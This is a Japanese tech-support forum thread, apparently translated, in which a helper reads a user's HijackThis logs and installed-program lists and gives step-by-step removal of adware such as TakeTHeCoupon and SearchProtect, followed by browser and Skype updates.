O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\WINDOWS\system32\fxssvc.exe (file missing)
O23 - Service: Freemake Improver - Freemake - C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe
O23 - Service: Google Japanese Input Cache Service (GoogleIMEJaCacheService) - Google Inc. - C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\WINDOWS\system32\IEEtwCollector.exe (file missing)
O23 - Service: Intel(R) HD Graphics Control Panel Service (igfxCUIService1.0.0.0) - Unknown owner - C:\WINDOWS\system32\igfxCUIService.exe (file missing)
O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\HeciServer.exe
O23 - Service: iPod サービス (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: McAfee Security Scan Component Host Service (McComponentHostService) - McAfee, Inc. - C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\WINDOWS\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\WINDOWS\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\WINDOWS\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\WINDOWS\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\WINDOWS\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: Tango Core Service (TangoCoreService) - Unknown owner - C:\Program Files (x86)\Siemens\Common\TangoCoreService.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\WINDOWS\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\WINDOWS\System32\vds.exe (file missing)
O23 - Service: @oem4.inf,%ViaKaraokeSrv.SvcDesc%;VIA Karaoke digital mixer Service (VIAKaraokeService) - Unknown owner - C:\WINDOWS\system32\viakaraokesrv.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\WINDOWS\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\WINDOWS\system32\wbengine.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-320 (WdNisSvc) - Unknown owner - C:\Program Files (x86)\Windows Defender\NisSrv.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-310 (WinDefend) - Unknown owner - C:\Program Files (x86)\Windows Defender\MsMpEng.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 10790 bytes


CC
Adobe AIR Adobe Systems Incorporated 2014/11/13 3.6.0.6090
Adobe Flash Media Live Encoder 3.2 Adobe Systems Incorporated 2012/10/31 15.8 MB 3.2.0
Adobe Flash Player 16 NPAPI Adobe Systems Incorporated 2015/02/05 6.00 MB 16.0.0.305
Adobe Reader XI (11.0.10) - Japanese Adobe Systems Incorporated 2015/02/08 206 MB 11.0.10
AdPunisher AdPunisher 2014/02/22
Age of Empires II: HD Edition Hidden Path Entertainment, Ensemble Studios 2014/11/13
AmaRecTV Live 2014/11/13
AmvVideoCodec 2014/11/13
Apple Application Support Apple Inc. 2014/10/03 93.4 MB 3.0.6
Apple Mobile Device Support Apple Inc. 2014/10/03 21.6 MB 8.0.0.23
Apple Software Update Apple Inc. 2012/10/31 2.38 MB 2.1.3.127
ApplicationManager 2011.4.27.209 kingsoft 2014/11/13 2011.4.27.209
ArcheAge XLGAMES 2014/08/10
ArcheAge GameOn 2014/11/13 1
au Wi-Fi接続ツール 株式会社 ネットビジョン 2014/11/13
CCleaner Piriform 2015/04/04 5.04
Common GameOn 2014/11/13 46603608
Creative システム インフォメーション Creative Technology Limited 2014/11/13 1.10
CutterFunc CutterFunc 2014/02/25
DAEMON Tools Lite Disc Soft Ltd 2014/11/13 4.49.1.0356
DaigiCoupon "" 2015/03/24
DC-Bass Source 1.3.0 2014/11/13
DirectVobSub 2.40.4209 MPC-HC Team 2014/02/15 2.10 MB 2.40.4209
DivXセットアップ DivX, LLC 2014/11/13 2.6.1.90
Dropmark sidebar "" 2015/03/24
eo接続ツール Siemens 2012/10/31 2.0
ffdshow v1.1.4399 [2012-03-22] 2014/02/15 13.5 MB 1.1.4399.0
Gamepot Web実行環境 Gamepot 2012/12/04 308 KB 1.1.0
Google Chrome Google Inc. 2014/05/10 34.0.1847.131
Google 日本語入力 Google Inc. 2014/01/07 83.0 MB 1.13.1641.0
Hangame 2014/11/13
HiJackThis Trend Micro 2013/08/24 369 KB 1.0.0
Hounds DMM 2014/05/10 1.0.0
iFunbox (v2.94.2520.758), iFunbox DevTeam 2015/02/27 23.3 MB v2.94.2520.758
Intel(R) Management Engine Components Intel Corporation 2012/09/20 8.1.0.1281
Intel(R) Processor Graphics Intel Corporation 2012/09/20 9.17.10.2849
Intel(R) SDK for OpenCL - CPU Only Runtime Package Intel Corporation 2014/11/13 2.0.0.37149
iTunes Apple Inc. 2014/10/03 219 MB 11.4.0.18
KDrive kingsoft 2014/11/13 1.21.0.1584
KDriveプラグイン kingsoft 2014/11/13 1.0.0.1
Lagarith Lossless Codec (1.3.27) 2014/02/15 1.02 MB
LAME v3.99.3 (for Windows) 2014/02/15 1.52 MB
Lhaplus 2014/11/13
LightCapture I-O DATA DEVICE,INC. 2014/02/12 1.10.0000
LimeChat 2 Satoshi Nakagawa 2014/11/13 2.40
LINE LINE Corporation 2014/11/13 3.7.3.82
Microsoft Age of Empires II 2014/11/13
Microsoft Age of Empires II: The Conquerors Expansion 2014/11/13
Microsoft OneDrive Microsoft Corporation 2015/03/13 30.6 MB 17.3.4726.0226
Microsoft Visual C++ 2005 Redistributable Microsoft Corporation 2014/08/19 2.69 MB 8.0.59193
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 Microsoft Corporation 2014/02/12 3.70 MB 9.0.21022
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 Microsoft Corporation 2014/06/30 598 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 Microsoft Corporation 2012/10/30 10.2 MB 9.0.30729
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 Microsoft Corporation 2014/04/12 13.8 MB 10.0.40219
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 Microsoft Corporation 2014/04/12 11.1 MB 10.0.40219
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 Microsoft Corporation 2014/11/13 20.5 MB 11.0.60610.1
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 Microsoft Corporation 2014/11/13 17.3 MB 11.0.60610.1
Mozilla Firefox 36.0.4 (x86 ja) Mozilla 2015/03/24 84.6 MB 36.0.4
Mozilla Maintenance Service Mozilla 2014/11/13 225 KB 29.0
MyBookEditor4 Asukanet 2015/02/05 46.0 MB 1.3.76
NeoplePlugin 2014/11/13
Niconico Live Encoder niwango, inc. 2014/08/06 2.0.4
OpenSource Flash Video Splitter 1.0.0.5 2014/11/13 1.0.0.5
Pmangインストールマネージャー GameOn,Pmang 2014/11/13 1.0.1.1
Project 64 version 2.1.0.1 2014/11/13 9.64 MB 2.1.0.1
QuickTime 7 Apple Inc. 2014/08/30 70.2 MB 7.75.80.95
RPGツクール2000 ランタイムパッケージ 2014/11/13
RPGツクールVX Ace RTP Enterbrain 2014/03/14 194 MB 1.00
SaverExxtensiion "" 2015/03/24
Skype Click to Call Microsoft Corporation 2014/12/30 10.1 MB 7.3.16540.9015
Skype(TM) 7.1 Skype Technologies S.A. 2015/03/14 48.5 MB 7.1.105
SoundEngine Free Coderium 2012/10/31 5.0.0.6
Steam Valve Corporation 2014/11/13
TakeTHeCoupon "" 2015/03/24
TalesWeaver 2014/12/27
TERA GameOn 2015/02/12 8177808
Update for Japanese Microsoft IME Postal Code Dictionary Microsoft Corporation 2014/11/16 7.60 MB 16.0.1171.1
Update for Japanese Microsoft IME Standard Dictionary Microsoft Corporation 2014/11/16 40.3 MB 16.0.1404.1
Update for Japanese Microsoft IME Standard Extended Dictionary Microsoft Corporation 2014/11/16 11.5 MB 15.0.1215
Update for Japanese Microsoft IME Trending Words Dictionary Microsoft Corporation 2015/01/07 17.0 KB 16.0.1016.1
USB PC Camera (SN9C102) 2014/11/13 4.7.5.0
Ut Video Codec Suite UMEZAWA Takeshi 2013/10/28 1.97 MB 13.3.0
VIA プラットフォーム・デバイス・マネージャ VIA Technologies, Inc. 2012/10/30 2.62 MB 1.39
♪超録 - パソコン長時間録音機 フリーウェア版 2014/11/13
つよきす3学期 INTERHEART 2014/11/13 4.88 GB 1.9
ニコ生デスクトップキャプチャー(XP) SEASON2 Consolas 2012/10/31 1.41 MB 1.15
モンスターハンター フロンティアG CAPCOM CO., LTD. 2014/08/21 1.27.2000
俺たちに翼はないR Navel 2014/11/20 Version 1.00
幻想神域 X-Legend 2014/05/16 1.0000

That is all.
  • かなは
  • 2015/04/04 (Sat) 17:48:23
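It looks like there has been an additional infection
I have looked at your logs.
There was a mass infection on March 24.
That matches the Firefox update date, but I updated Firefox too and was not infected.
Perhaps you downloaded Firefox from some odd place and reinstalled it?
Firefox itself is also an old version.
The current latest version is 37.0.1, so let's update it as well by following the steps below.
And because of the reinfection, the removal work has to be redone.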

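Start the PC in Safe Mode.
Launch HJT and run a scan.
When the scan results appear, check the following items.
However, with HJT in particular, a single mistake can easily leave the PC unable to boot,
so never check anything other than what I have specified.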

O2 - BHO: TakeTHeCoupon - {6a6b254b-05d3-451a-9396-b7247e2e114e} - C:\Program Files (x86)\TakeTHeCoupon\CWRQMaSXmAvceq.dll
O2 - BHO: SaverExxtensiion - {6ec8ea13-7d70-415f-ab97-2aa8f4082c82} - C:\Program Files (x86)\SaverExxtensiion\LyRYa1TqoTYmQU.dll
O2 - BHO: ExstraSaviings - {78f73e11-e6b2-48a8-88b7-9c9db3ca8dc5} - C:\Program Files (x86)\ExstraSaviings\bW26gfXJvpMiqk.dll
O4 - HKLM\..\Run: [CnsMin] Rundll32.exe C:\Windows\DOWNLO~1\CnsMin.dll,Rundll32
O4 - HKLM\..\Run: [WinCheck] C:\Users\ryota\AppData\Local\03000200-1425075226-0500-0006-000700080009\bnsq55B.exe
O4 - Startup: Battle Network Rockman Exe 3 Black (Japan) (V1.1).lnk = C:\ProgramData\{021e6b93-a7a5-9558-021e-e6b93a7aae4e}\Battle Network Rockman Exe 3 Black (Japan) (V1.1).exe
O4 - Global Startup: McAfee Security Scan Plus.lnk = C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe
O9 - Extra button: JWord(日本語キーワード) - {5D73EE86-05F1-49ed-B850-E423120EC338} - http://www.jword.jp/intro/?partner=AP&type=lk&frm=iebutton (file missing)
O20 - AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC32Loader.dll
O23 - Service: Search Protect Service (CltMngSvc) - Client Connect LTD - C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe
O23 - Service: McAfee Security Scan Component Host Service (McComponentHostService) - McAfee, Inc. - C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe

Once all the required items are checked, click Fix checked.
When the Fix above is complete, launch Geek and remove the following.

AdPunisher AdPunisher 2014/02/22
CutterFunc CutterFunc 2014/02/25
DaigiCoupon "" 2015/03/24
Dropmark sidebar "" 2015/03/24
SaverExxtensiion "" 2015/03/24
TakeTHeCoupon "" 2015/03/24

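You can remove them by double-clicking.
When a removal finishes, a scan starts automatically; check all the leftovers it detects and press OK.
When uninstalling with Geek is complete, close Geek and clean up with ATF.
Check Select All and click Empty Selected.
When the ATF cleanup is complete, restart the PC in normal mode.
Click the following URL in Firefox.
https://www.mozilla.org/ja/firefox/new/
Follow the instructions to update.
When the Firefox update is complete, download Skype from the following URL.
http://www.skype.com/ja/download-skype/skype-for-computer/
Please update Skype to the latest version as well.
When the updates are complete, please paste the HJT and CC logs into the reply field once more and let me know.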
  • IVNO
  • MAIL
  • 2015/04/04 (Sat) 19:00:08
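Re: I'm troubled by pop-ups and ads being forcibly displayed.
Thank you for your reply.
I have finished the work above, so I am pasting the logs below. Please give me the next instructions.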

HJT
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 19:28:57, on 2015/04/04
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.9600.17416)
Boot mode: Normal

Running processes:
C:\Users\ryota\AppData\Roaming\ApplicationManager\bin\ApplicationManager.exe
C:\Program Files (x86)\Naver\LINE\Line.exe
C:\Program Files (x86)\i-Funbox DevTeam\iFunBox.exe
C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Program Files (x86)\Trend Micro\HiJackThis\HiJackThis.exe

F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O4 - HKLM\..\Run: [HDAudDeck] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe -r
O4 - HKLM\..\Run: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
O4 - HKLM\..\Run: [Google Japanese Input Prelauncher] "C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe" --mode=prelaunch_processes
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [DivXUpdate] "C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
O4 - HKLM\..\Run: [au_WiFi_Connect] "C:\Program Files (x86)\au Wi-Fi接続ツール\au_WiFi_Connect.exe" -x
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
O4 - HKCU\..\Run: [ApplicationManager] C:\Users\ryota\AppData\Roaming\ApplicationManager\bin\ApplicationManager.exe
O4 - HKCU\..\Run: [Line] "C:\Program Files (x86)\Naver\LINE\Line.exe" --booting
O4 - HKCU\..\Run: [Skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
O4 - HKCU\..\Run: [iFunBox Fast App Install Handler] C:\Program Files (x86)\i-Funbox DevTeam\iFunBox.exe /tray
O4 - HKCU\..\Run: [OneDrive] "C:\Users\ryota\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O9 - Extra button: JWord(日本語キーワード) - {5D73EE86-05F1-49ed-B850-E423120EC338} - http://www.jword.jp/intro/?partner=AP&type=lk&frm=iebutton (file missing)
O9 - Extra button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O11 - Options group: [!CNS] JWord(日本語キーワード)
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O16 - DPF: {1DC420F0-D89A-40D0-B5CC-92B9AD19A1AC} (HGPluginJP28 Class) - http://down.hangame.co.jp/jp/dist/hgstart/HGPluginJP28.cab
O16 - DPF: {255A2E53-D2E3-42DA-9C1D-36B289B8E18B} (DMMLauncherAx Control) - http://dl.app-netgame.dmm.com/launcher/DMMLauncherAx_32.cab
O16 - DPF: {5082D9B5-5538-4C50-BDB1-C5F44BFB98CC} (HgRunPub Class) - http://down.hangame.co.jp/jp/installer/HgRunPub.cab
O16 - DPF: {AA07EBD2-EBDD-4BD6-9F8F-114BD513492C} (NeffyLauncherCtl Class) - http://dist.cdnetworks.co.jp/cdndist/neffy/NeffyLauncher.cab
O16 - DPF: {D4B68B83-8710-488B-A692-D74B50BA558E} (Creative Software AutoUpdate Support Package 2) - http://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab
O16 - DPF: {E705A591-DA3C-4228-B0D5-A356DBA42FBF} (Creative Software AutoUpdate 2) - http://ccfiles.creative.com/Web/softwareupdate/su2/ocx/20015/CTSUEng.cab
O16 - DPF: {F6ACF75C-C32C-447B-9BEF-46B766368D29} (Creative Software AutoUpdate Support Package) - http://ccfiles.creative.com/Web/softwareupdate/ocx/121022/CTPID.cab
O16 - DPF: {F8160836-0C11-4CA4-AD87-944542C7BCBD} (PubPlugin Class) - http://down.hangame.co.jp/jp/purple/launcher/PubPlugin.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{0693221B-E6F5-43F7-953D-6A2229EB2054}: NameServer = 60.56.0.135 218.251.89.134
O17 - HKLM\System\CS1\Services\Tcpip\..\{0693221B-E6F5-43F7-953D-6A2229EB2054}: NameServer = 60.56.0.135 218.251.89.134
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
O18 - Protocol: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\WINDOWS\System32\alg.exe (file missing)
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: auWifiConnectSvc - Unknown owner - C:\Program Files (x86)\au Wi-Fi接続ツール\auWifiConnectSvc.exe (file missing)
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\WINDOWS\system32\fxssvc.exe (file missing)
O23 - Service: Google Japanese Input Cache Service (GoogleIMEJaCacheService) - Google Inc. - C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\WINDOWS\system32\IEEtwCollector.exe (file missing)
O23 - Service: Intel(R) HD Graphics Control Panel Service (igfxCUIService1.0.0.0) - Unknown owner - C:\WINDOWS\system32\igfxCUIService.exe (file missing)
O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\HeciServer.exe
O23 - Service: iPod サービス (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\WINDOWS\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\WINDOWS\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\WINDOWS\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\WINDOWS\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\WINDOWS\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: Tango Core Service (TangoCoreService) - Unknown owner - C:\Program Files (x86)\Siemens\Common\TangoCoreService.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\WINDOWS\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\WINDOWS\System32\vds.exe (file missing)
O23 - Service: @oem4.inf,%ViaKaraokeSrv.SvcDesc%;VIA Karaoke digital mixer Service (VIAKaraokeService) - Unknown owner - C:\WINDOWS\system32\viakaraokesrv.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\WINDOWS\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\WINDOWS\system32\wbengine.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-320 (WdNisSvc) - Unknown owner - C:\Program Files (x86)\Windows Defender\NisSrv.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-310 (WinDefend) - Unknown owner - C:\Program Files (x86)\Windows Defender\MsMpEng.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 10687 bytes

CC

Adobe AIR Adobe Systems Incorporated 2014/11/13 3.6.0.6090
Adobe Flash Media Live Encoder 3.2 Adobe Systems Incorporated 2012/10/31 15.8 MB 3.2.0
Adobe Flash Player 16 NPAPI Adobe Systems Incorporated 2015/02/05 6.00 MB 16.0.0.305
Adobe Reader XI (11.0.10) - Japanese Adobe Systems Incorporated 2015/02/08 206 MB 11.0.10
Age of Empires II: HD Edition Hidden Path Entertainment, Ensemble Studios 2014/11/13
AmaRecTV Live 2014/11/13
AmvVideoCodec 2014/11/13
Apple Application Support Apple Inc. 2014/10/03 93.4 MB 3.0.6
Apple Mobile Device Support Apple Inc. 2014/10/03 21.6 MB 8.0.0.23
Apple Software Update Apple Inc. 2012/10/31 2.38 MB 2.1.3.127
ApplicationManager 2011.4.27.209 kingsoft 2014/11/13 2011.4.27.209
ArcheAge XLGAMES 2014/08/10
ArcheAge GameOn 2014/11/13 1
au Wi-Fi接続ツール 株式会社 ネットビジョン 2014/11/13
CCleaner Piriform 2015/04/04 5.04
Common GameOn 2014/11/13 46603608
Creative システム インフォメーション Creative Technology Limited 2014/11/13 1.10
DAEMON Tools Lite Disc Soft Ltd 2014/11/13 4.49.1.0356
DC-Bass Source 1.3.0 2014/11/13
DirectVobSub 2.40.4209 MPC-HC Team 2014/02/15 2.10 MB 2.40.4209
DivXセットアップ DivX, LLC 2014/11/13 2.6.1.90
eo接続ツール Siemens 2012/10/31 2.0
ffdshow v1.1.4399 [2012-03-22] 2014/02/15 13.5 MB 1.1.4399.0
Gamepot Web実行環境 Gamepot 2012/12/04 308 KB 1.1.0
Google Chrome Google Inc. 2014/05/10 34.0.1847.131
Google 日本語入力 Google Inc. 2014/01/07 83.0 MB 1.13.1641.0
Hangame 2014/11/13
HiJackThis Trend Micro 2013/08/24 369 KB 1.0.0
Hounds DMM 2014/05/10 1.0.0
iFunbox (v2.94.2520.758), iFunbox DevTeam 2015/02/27 23.3 MB v2.94.2520.758
Intel(R) Management Engine Components Intel Corporation 2012/09/20 8.1.0.1281
Intel(R) Processor Graphics Intel Corporation 2012/09/20 9.17.10.2849
Intel(R) SDK for OpenCL - CPU Only Runtime Package Intel Corporation 2014/11/13 2.0.0.37149
iTunes Apple Inc. 2014/10/03 219 MB 11.4.0.18
KDrive kingsoft 2014/11/13 1.21.0.1584
KDriveプラグイン kingsoft 2014/11/13 1.0.0.1
Lagarith Lossless Codec (1.3.27) 2014/02/15 1.02 MB
LAME v3.99.3 (for Windows) 2014/02/15 1.52 MB
Lhaplus 2014/11/13
LightCapture I-O DATA DEVICE,INC. 2014/02/12 1.10.0000
LimeChat 2 Satoshi Nakagawa 2014/11/13 2.40
LINE LINE Corporation 2014/11/13 3.7.3.82
Microsoft Age of Empires II 2014/11/13
Microsoft Age of Empires II: The Conquerors Expansion 2014/11/13
Microsoft OneDrive Microsoft Corporation 2015/03/13 30.6 MB 17.3.4726.0226
Microsoft Visual C++ 2005 Redistributable Microsoft Corporation 2014/08/19 2.69 MB 8.0.59193
